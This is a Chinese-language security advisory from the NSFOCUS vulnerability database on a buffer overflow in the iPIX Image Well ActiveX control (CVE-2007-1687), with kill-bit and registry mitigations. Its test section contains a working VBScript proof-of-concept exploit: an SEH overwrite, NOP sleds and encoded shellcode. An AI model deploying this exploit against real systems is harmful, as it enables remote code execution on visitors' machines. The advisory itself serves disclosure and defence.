绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

IPIX Image Well ActiveX控件缓冲区溢出漏洞

发布日期：2007-04-09
更新日期：2007-04-12

受影响系统：

Internet Pictures Corporation iPIX Image Well ActiveX

描述：

BUGTRAQ  ID: 23379
CVE(CAN) ID: CVE-2007-1687

Internet Pictures Corporation可提供用于创建360度全景图形的设备和软件。

Internet Pictures Corporation软件产品所提供的iPIX Image Well ActiveX控件（iPIX-ImageWell-ipix.dll）中存在缓冲区溢出，如果用户受骗访问了恶意站点的话，就可能触发这个溢出，导致执行任意指令，或导致IE或使用WebBrowser控件的程序崩溃。

<*来源：Will Dormann

  链接：http://secunia.com/advisories/24816/
        http://www.kb.cert.org/vuls/id/958609
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:F7A05BAC-9778-410A-9CDE-BFBD4D5D2B7F" > </OBJECT>

<script language="vbscript">

targetFile = "C:\test\iPIX-ImageWell-ipix\iPIX-ImageWell-ipix.dll"
prototype  = "Function CreateMediaGroup ( ByVal bUserID As String ,  ByVal bPassword As String ,  ByVal bGroupHandle As String ,  ByVal
NumElements As Integer ,  ByVal bServiceType As String ,  ByVal bIPAddr As String ) As Integer"
memberName = "CreateMediaGroup"
progid     = "PWACTIVEXIMGCTLLib.PWMediaSendControl"
argCount   = 6



shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")

nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")

pointer_to_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")

arg1=String(4365, "A")
arg2="defaultV"
arg3="defaultV"
arg4=1
arg5="defaultV"
arg6="defaultV"

arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop

target.CreateMediaGroup arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script>
</body>
</html>

建议：

临时解决方法：

为以下CLSID设置kill bit：

      {ef8d9f2a-f641-4ef0-b2ec-3ba2be7c2960}
      {f7a05bac-9778-410a-9cde-bfbd4d5d2b7f}

或者将以下文本保存为.REG文件并导入：

      Windows Registry Editor Version 5.00

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{ef8d9f2a-f641-4ef0-b2ec-3ba2be7c2960}]
      "Compatibility Flags"=dword:00000400

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{f7a05bac-9778-410a-9cde-bfbd4d5d2b7f}]
      "Compatibility Flags"=dword:00000400

厂商补丁：

Internet Pictures Corporation
-----------------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ipix.com/

浏览次数：4234
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客